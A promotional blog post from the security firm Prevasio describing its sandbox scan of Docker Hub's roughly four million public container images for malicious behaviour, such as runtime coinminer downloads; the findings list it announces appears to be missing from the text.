Linux containers aren't new. In fact, this technology was invented 20 years ago.
In 2013, Docker entered the scene and revolutionized Linux containers by offering an easy-to-use command line interface (CLI), an engine, and a registry server. Combined, these technologies have concealed all the complexity of building and running containers, by offering one common industry standard. As a result, Docker’s popularity has sky-rocketed, rivalling Virtual Machines, and transforming the industry.
In order to locate and share Docker container images, Docker is offering a service called Docker Hub. Its main feature, repositories, allows the development community to push (upload) and pull (download) container images.
With Docker Hub, anyone in the world can download and execute any public image, as if it was a standalone application.
Today, Docker Hub accounts over 4 million public Docker container images.
With 8 billion pulls (downloads) in January 2020 and growing, its annualized image pulls should top 100 billion this year.
How many container images currently hosted at Docker Hub are malicious or potentially harmful? What sort of damage can they inflict?
What if a Docker container image downloaded and executed malware at runtime? Is there a reliable way to tell that?
What if a compromised Docker container image was downloaded by an unsuspecting customer and used as a parent image to build and then deploy a new container image into production, practically publishing an application with a backdoor built into it? Is there any way to stop that from happening?
At Prevasio, we asked ourselves these questions multiple times.
What we decided to do has never been done before.
At Prevasio, we have built a dynamic analysis sandbox that uses the same principle as a conventional sandbox that 'detonates' malware in a safe environment. The only difference is that instead of 'detonating' an executable file, such as a Windows PE file or a Linux ELF binary, Prevasio Analyzer first pulls (downloads) an image from any container registry, and then 'detonates' it in its own virtual environment, outside the organization/customer infrastructure.
Using our solution, we then dynamically analyzed all 4 million container images hosted at Docker Hub.
In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.
The result of our dynamic scan reveals that:
Our analysis of malicious containers also shows that quite a few images contain a dynamic payload. That is, an image in its original form does not have a malicious binary. However, at runtime, it might be scripted to download a source of a coinminer, to then compile and execute it.
A dynamic analysis sandbox, such as Prevasio Analyzer, is the only solution that provides a behavioral analysis of Docker containers. It is built to reveal malicious intentions of Docker containers by executing them in its own virtual environment, revealing a full scope of their behavior.
The whitepaper with our findings is available here.